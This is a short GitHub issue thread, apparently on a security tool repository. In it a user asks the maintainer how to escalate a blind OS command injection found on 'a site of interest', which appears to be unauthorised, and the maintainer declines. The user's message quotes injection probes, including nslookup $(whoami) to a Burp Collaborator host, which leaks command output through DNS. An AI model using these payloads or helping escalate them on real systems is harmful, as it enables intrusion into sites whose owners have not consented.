carlospolop
commented
2 months ago I'm sorry, this is not the channel for this type of questions. Check in telegram/discord hacking groups better
Closed Deviandorex closed 2 months ago
carlospolop
commented
2 months ago I'm sorry, this is not the channel for this type of questions. Check in telegram/discord hacking groups better
Hello friend, I was reviewing your profile and I think you are the right person for the help I need.
A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature
Issue: OS command injection Severity: High Confidence: Certain
the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator.
These are the only commands it respond to.
nslookup xxx.burpcolaborator.comping xxx.burpcolaborator.comsleep 10other commands like
nslookup $(whoami).xxx.burp collaborator.comThey do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.I await your response. Thanx